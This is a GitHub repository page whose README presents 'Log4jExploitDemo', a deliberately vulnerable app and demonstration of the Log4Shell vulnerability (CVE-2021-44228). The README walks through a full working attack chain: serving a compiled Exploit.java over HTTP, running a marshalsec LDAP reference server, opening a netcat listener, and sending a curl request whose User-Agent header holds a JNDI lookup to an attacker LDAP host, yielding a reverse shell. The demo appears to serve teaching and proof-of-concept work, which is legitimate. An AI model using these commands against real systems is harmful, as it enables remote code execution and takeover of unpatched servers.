Skip to content

pwnipc/Log4jExploitDemo

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
exploit
exploit
 
 
src/main/java
src/main/java
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
build.gradle
build.gradle
 
 

Repository files navigation

Log4jExploitDemo

A log4j vulnerable app used in a log4j session as a demo and proof of concept for the recently discovered CVE-2021-44228 vulnerability

Setup and exploitation Steps

  1. Compile Exploit.java and start http server

    1. cd Log4jExploitDemo/exploit
    2. javac Exploit.java
    3. start http server,python python3 -m http.server or php,php -S 127.0.0.1:8000

  2. Start ldap server

    1. git clone git@github.com:mbechler/marshalsec.git
    2. cd marshalsec
    3. mvn clean package -DskipTests
    4. start ldap server java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#Exploit"

  3. Setup a netcat listener on the attacker machine

    nc -lnvp 9999

  4. Run the vulnerable application

    1. gradle must be installed in the victim machine https://gradle.org/install/
    2. ncat must be installed in the victim machine for this to work sudo apt install ncat
    3. cd Log4jExploitDemo && gradle run

  5. Trigger the exploit and get a reverse shell in the netcat listener

    curl -H 'User-Agent: ${jndi:ldap://<attacker-ip>:1389/Exploit}' http://<victim-ip>:9090

About

No description, website, or topics provided.

Resources

Readme

License

MIT license
Activity

Stars

1 star

Watchers

2 watching

Forks

0 forks
Report repository

Releases

No releases published

Languages